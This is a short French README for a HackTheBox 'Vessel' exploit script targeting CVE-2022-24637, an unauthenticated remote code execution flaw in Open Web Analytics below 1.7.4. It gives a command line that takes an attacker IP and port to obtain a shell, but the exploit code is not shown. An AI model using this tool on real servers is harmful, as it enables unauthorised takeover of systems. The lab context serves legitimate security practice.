
RCE non authentifiée dans Open Web Analytics version <1.7.4
RCE non authentifiée dans Open Web Analytics version <1.7.4
Ce script est conçu pour automatiser la vulnérabilité CVE-2022-24637. J'ai créé cet exploit pour ma machine Hackthebox vessel. https://app.hackthebox.com/machines/Vessel
L'exploit et l'idée sont basés sur https://devel0pment.de/?p=2494
Exécutez le script avec les paramètres suivants :
python3 exploit.py http://<url>/ newPassword YourIp YourPort
Il est possible que vous deviez l'exécuter plusieurs fois pour obtenir un shell.
Le script peut être amélioré.
